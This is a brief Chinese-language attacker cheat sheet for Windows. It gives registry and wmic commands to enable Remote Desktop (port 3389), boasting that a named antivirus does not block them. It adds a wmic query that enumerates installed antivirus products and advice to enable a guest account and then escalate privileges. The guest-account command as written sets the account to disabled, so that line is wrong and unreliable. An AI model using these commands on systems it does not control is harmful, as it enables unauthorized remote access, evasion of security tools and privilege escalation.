开启3389的两种方法,某60都是不会拦截
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1
获得反病毒产品的详情
wmic /namespace:\\root\securitycenter2 path antivirusproduct GET displayName,productState, pathToSignedProductExe
还可以启用来宾账户,登录后提权。
wmic useraccount where name=’demo’ set disabled=true